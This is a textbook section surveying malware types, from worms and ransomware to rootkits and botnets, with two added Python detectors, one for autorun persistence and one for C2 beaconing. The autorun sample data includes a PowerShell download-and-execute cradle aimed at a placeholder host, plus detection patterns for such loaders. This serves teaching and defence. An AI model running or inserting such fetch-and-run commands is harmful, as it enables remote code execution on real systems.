
Section 3.3 Types of Malware

The definition of malware is broad, and new malware is created daily, which can make malware difficult to classify. As we go through some basic types, please keep in mind that there is significant overlap. For example, you may encounter ransomware distributed as a virus or ransomware distributed as a trojan. The fact that it is ransomware does not preclude it from also being some other type of malware.

Subsection 3.3.1 Worms, Viruses, and Trojans

Worms, Viruses, and Trojans are all types of malware that are often confused with one another. The main difference between these three types of malware is how they spread and what they do once they have infected a host. Worms are self-propagating programs that spread without user interaction. Their code is typically stored within an independent object, such as a hidden executable file. Worms often do not severely damage their host, as they are concerned with rapid, exponential spreading.

Example 3.3.1. Stuxnet.

Stuxnet was a 2010 worm that specifically targeted Iranian nuclear facilities. The worm used an unprecedented four zero-day attacks and was designed to spread via USB flash drives and Remote Procedure Calls (RPCs), so it did not rely solely on networks to propagate. Ultimately Stuxnet’s payload targeted the code used to program the PLC devices that control motors, making them spin too fast and destroying the centrifuges. Stuxnet also employed an impressive rootkit to cover its tracks. Given its level of sophistication, Stuxnet is believed to have been developed by the US and Israel.

Viruses typically require user interaction, such as copying an infected file from one machine to another, and store their code inside another file on a machine. An executable file may be infected by having the virus code added as a separate page that executes before the standard program code. Viruses can be quite damaging to the host, as they may take significant resources to spread locally. The term virus is also an unfortunately overloaded one: due to its popularity it is often used by lower-skill threat actors to refer to many different types of malware.

Example 3.3.2. Concept Virus.

The Concept virus was the first example of a Microsoft Word macro virus. The virus hid itself inside Microsoft Word files and used Word’s embedded macro language to perform its replication tasks. Viruses were later created for Excel and other programs that had sufficiently sophisticated yet ultimately insecure internal scripting languages.
A trojan is a form of malware that disguises itself as legitimate software. It does not have to rely on a software exploit as much as it exploits users into installing, running, or giving extra privileges to the malicious code. Trojans are the most popular kind of malware as they can be used as an attack vector for many other payloads. The name comes from Greek mythology, where a Trojan horse was disguised as a gift and given to a besieged town. Within the large horse were secret troops who came out in the middle of the night and opened the town gates.

Example 3.3.3. Emotet.

Emotet is a banking trojan from 2014 that spread through emails. It made use of malicious links or macro-enabled documents to get the user to download its code. Emotet has been one of the most costly and destructive pieces of malware, currently averaging about one million in incident remediation costs. It continues to be adapted to avoid detection and to make use of even more sophisticated malware.

Subsection 3.3.2 Ransomware

Figure 3.3.4. Wana Decrypt0r Malware Screen
(Screenshot of the WannaCry ransomware’s demand window, "Wana Decrypt0r 2.0". It informs the user that their files have been encrypted and demands a ransom payment in Bitcoin, typically showing the ransom amount (e.g., $300 or $600), Bitcoin payment addresses, countdown timers for when the price increases and when the files will be permanently lost, and sections explaining what happened to the files and how to pay. Image: en.wikipedia.org/wiki/File:Wana_Decrypt0r_screenshot.png, used under fair use.)
Ransomware is a type of malware that encrypts files and demands a ransom to decrypt them. Modern ransomware uses symmetric encryption to encrypt the files quickly and then encrypts the symmetric key asymmetrically using a hard-coded public key for which the threat actor holds the corresponding private key. When the ransom is paid, typically via cryptocurrency, the threat actor can decrypt the symmetric key using their private key, and the user can then use the symmetric key to decrypt the files.
Ransomware is also considered a data breach, as the data is often exfiltrated as well. It is worth noting that even when the ransom is paid, there is no guarantee that the threat actor will actually begin the decryption process. Typical targets of ransomware include corporate infrastructure and health care systems, although ransomware may also be spread indiscriminately. The payout of ransoms can be a large money-making enterprise, so many APTs and criminal groups employ it. Ransomware is considered the biggest threat to cyber stability today.

Subsection 3.3.3 Spyware

Malware specifically designed for espionage/data theft is known as spyware. Like ransomware, spyware can also have a monetary payoff for the threat actor. Actors may use extortion to demand payment or the data will be leaked. This typically means either sold on the dark web or publicly posted. Once again, given the possibility of monetary gain, spyware is often associated with criminal groups. APTs may use spyware as well to obtain secrets of national importance.
Customer data, trade secrets, proprietary data, and government secrets are all targets of spyware. Even outside of government systems, in the corporate setting, spyware is still a major threat.
Figure 3.3.5. Typical Attack Chain of Fileless Malware
(Flowchart: a user clicks a malicious link in a spam email; the website loads a JavaScript exploit; the exploit triggers shellcode that runs a PowerShell one-liner, which downloads and runs the main payload directly in memory from remotely hosted scripts and executables; an auto-start registry entry provides persistence so the payload is re-run after a restart. Nothing malicious is written to disk, which makes detection harder.)
Malware is often detected by scanning storage for files that match a particular hash or by looking in files to see if they contain patterns. Both of these detection techniques rely on the malware being stored in a file. Fileless malware attempts to avoid detection by leaving no footprint in the file system. This type of malware uses legitimate processes to load itself into memory, often with a registry key created to reload every time the machine is restarted. This creates a persistent, hard-to-detect type of malware that is often used by sophisticated threat actors such as APTs and criminal groups.
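Because a fileless loader leaves nothing on disk to hash, defenders instead look at where it must persist: the auto-start entries themselves. The following is an added example (not code from the textbook) that scores exported Run-key values with heuristics for script-host loaders; the sample values, the heuristic patterns and their weights are all assumptions constructed for this illustration.

```python
import re

# Constructed sample, not from any real system: (value name, command) pairs as they
# might be exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    # the base64 blob below is a meaningless placeholder, not a real encoded command
    ("Updater", r"powershell.exe -nop -w hidden -enc QQBBAEEAQQA="),
    ("HelperSvc", r"cmd.exe /c powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"),
    ("Spotify", r"C:\Users\alice\AppData\Roaming\Spotify\Spotify.exe /background"),
]

# Script hosts that in-memory loaders typically live in: the command line is the only artifact.
SCRIPT_HOSTS = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.I)

# (label, pattern, weight); weights are an assumption chosen for this example.
HEURISTICS = [
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), 3),
    ("hidden-window",   re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 2),
    ("no-profile",      re.compile(r"-nop(rofile)?\b", re.I), 1),
    ("bypass-policy",   re.compile(r"-e(xecution)?p(olicy)?\s+bypass\b", re.I), 2),
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I), 3),
    ("in-memory-exec",  re.compile(r"\bIEX\b|Invoke-Expression|FromBase64String", re.I), 3),
]


def score_autorun(command):
    """Return (score, [matched labels]) for one autorun command line."""
    if not SCRIPT_HOSTS.search(command):
        return 0, []  # plain executable path: the heuristics below only apply to script hosts
    hits = [label for label, pat, _ in HEURISTICS if pat.search(command)]
    score = sum(w for label, _, w in HEURISTICS if label in hits)
    return score, hits


def scan_run_values(values, threshold=4):
    """Flag every Run value whose score reaches the threshold (threshold is an assumption)."""
    findings = []
    for name, cmd in values:
        score, hits = score_autorun(cmd)
        if score >= threshold:
            findings.append({"name": name, "score": score, "reasons": hits})
    return findings


if __name__ == "__main__":
    for f in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"{f['name']}: score {f['score']} ({', '.join(f['reasons'])})")
```

On a real host the same scoring would be applied to every autorun location (Run/RunOnce keys, scheduled tasks, WMI subscriptions, services), since an attacker chooses whichever one the defender is not watching.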

Subsection 3.3.4 Cryptojacking

Cryptocurrencies utilizing proof-of-work algorithms have made it easier than ever for programs to convert processor cycles into money. Certain types of malware capitalize on this by mining cryptocurrency in the background on a user's machine. This theft of power and resources results in income for the malware distributor when the funds from mining are deposited into their online wallet.
Cryptojacking is more popular than ever, especially considering that large botnets of infected machines have already been created. Cryptojacking creates a simpler path to monetization for malicious actors who may already have control of many compromised machines.

Subsection 3.3.5 Rootkit

A rootkit is a secret program designed to give backdoor access to a system. Rootkits are designed to remain hidden and may even actively disable or circumvent security software. Due to their low-level nature, many rootkits can be difficult to detect and even more difficult to remove.
Figure 3.3.6. Rootkits are often classified in accordance with the layer in which they are hidden.
(Diagram of system layers from lowest to highest: Physical Hardware; Firmware (Firmware Rootkit); Bootloader (Bootloader Rootkit); Kernel (Kernel-mode Rootkit); User Space (Application Rootkit). The deeper the layer, the harder the rootkit is to detect and remove, because it is embedded in a more fundamental part of the system.)

Subsubsection 3.3.5.1 Firmware Rootkit

Firmware is code that a hardware device uses to run. It is often a thin layer of commands used for setting up and interfacing with the device. A firmware rootkit may reside in the BIOS of a motherboard and can be very difficult to remove.

Subsubsection 3.3.5.2 Bootloader Rootkit

A bootloader prepares the system to boot an operating system kernel, typically by loading the kernel into memory. A bootloader rootkit may hijack this process to load itself into separate memory space or manipulate the kernel being loaded.

Subsubsection 3.3.5.3 Kernel-mode Rootkit

Many operating system kernels, including Linux, have the ability to load dynamic modules. These kernel modules have complete access to OS kernel operations. A kernel-mode rootkit can be difficult to detect on a live system, since the very kernel being asked to detect the rootkit can no longer be trusted.

Subsubsection 3.3.5.4 Application Rootkit

An application or user-mode rootkit is usually installed as an application that runs in the background with administrative privileges. These rootkits are typically the easiest to develop and deploy, since low-level knowledge of the system's hardware is not required, but they are also the easiest to detect and remove.

Example 3.3.7. Sony Rootkit.

In 2005 Sony released music CDs whose copy-protection software included an application rootkit designed to run on Microsoft Windows systems. The rootkit ran persistently in the background, slowing systems, and had no uninstaller to remove the program. It was designed to prevent the OS from copying information from audio CDs, but it also opened up several security holes that could be exploited by other malware. Ultimately the rootkit led to several class-action lawsuits against Sony BMG and to a settlement with the Federal Trade Commission that required Sony to reimburse customers who reported damages from the rootkit.

Subsection 3.3.5.1 Botnet

A botnet is a network of exploited hosts controlled by a single party. These hosts may be desktop computers, servers, or even internet of things (IoT) devices. Botnets are often used in large-scale distributed denial of service (DDoS) attacks where the nature of the attack is to have many machines flooding a single machine with traffic. Botnets may also be used to send spam emails as their access to SMTP email relay may vary depending on their internet service provider (ISP).
Bots are typically controlled through a command and control (C2, C&C) server. While this C2 server may use a custom protocol, it is far more typical for modern botnets to rely on other infrastructure. C2 traffic can use SSH, HTTP, Internet Relay Chat (IRC), or even Discord to send commands to bots and receive data from bots.
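Because C2 traffic rides on ordinary protocols such as HTTP, defenders often look for the timing rather than the content: a bot checking in with its C2 server tends to do so at a fixed interval. The following is an added example (not code from the textbook) that groups constructed proxy log lines by client and destination and flags pairs whose request gaps are unusually regular; the log format, the sample entries and the thresholds are all assumptions made for this illustration.

```python
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log excerpt (not from any real network): time, client, destination host, path.
# 10.0.0.7 polls updates.example.invalid every ~300 s; 10.0.0.5 browses at irregular times.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 cdn.example.invalid /lib/jquery.js
2024-05-01T10:00:03 10.0.0.7 updates.example.invalid /check
2024-05-01T10:01:00 10.0.0.5 cdn.example.invalid /img/logo.png
2024-05-01T10:05:03 10.0.0.7 updates.example.invalid /check
2024-05-01T10:10:02 10.0.0.7 updates.example.invalid /check
2024-05-01T10:11:40 10.0.0.5 cdn.example.invalid /css/site.css
2024-05-01T10:15:04 10.0.0.7 updates.example.invalid /check
2024-05-01T10:20:03 10.0.0.7 updates.example.invalid /check
2024-05-01T10:25:03 10.0.0.7 updates.example.invalid /check
2024-05-01T10:47:15 10.0.0.5 cdn.example.invalid /api/search
"""


def parse_log(text):
    """Yield (timestamp, client, host) per line; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        yield datetime.fromisoformat(parts[0]), parts[1], parts[2]


def find_beacons(text, min_events=5, max_cv=0.1):
    """Return (client, host) pairs whose inter-request gaps have a low coefficient of
    variation (stdev / mean). min_events and max_cv are assumed thresholds."""
    seen = {}
    for ts, client, host in parse_log(text):
        seen.setdefault((client, host), []).append(ts)
    findings = []
    for (client, host), times in seen.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            findings.append({"client": client, "host": host,
                             "interval_s": round(avg), "cv": round(cv, 4)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['host']} every ~{f['interval_s']} s (cv={f['cv']})")
```

Bots that add random jitter to their check-in interval raise the coefficient of variation on purpose, so in practice this timing check is combined with other signals such as rare destinations or constant response sizes.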

Subsection 3.3.6 RAT

RAT stands for Remote Access Trojan, and it is used to gain full access to and control of a remote target. The malware distributor can browse the files on a computer, send keystrokes and mouse movements, view the screen, and/or monitor the input from the microphone and camera. RATs often actively bypass security controls and as such may be difficult to detect.

Subsection 3.3.7 Adware / Potentially Unwanted Programs (PUP)

Adware is malware that is designed to track user behavior and deliver unwanted, sometimes intrusive, tailored ads. Adware may slow down a system and/or add ad walls to sites. This type of malware often targets a user's web browser.
Potentially Unwanted Programs (PUP) are typically downloaded as part of the install of another program. Common PUPs are browser toolbars, PDF readers, compression utilities, or browser extensions. These programs may have adware/spyware components in them and can also slow down a system.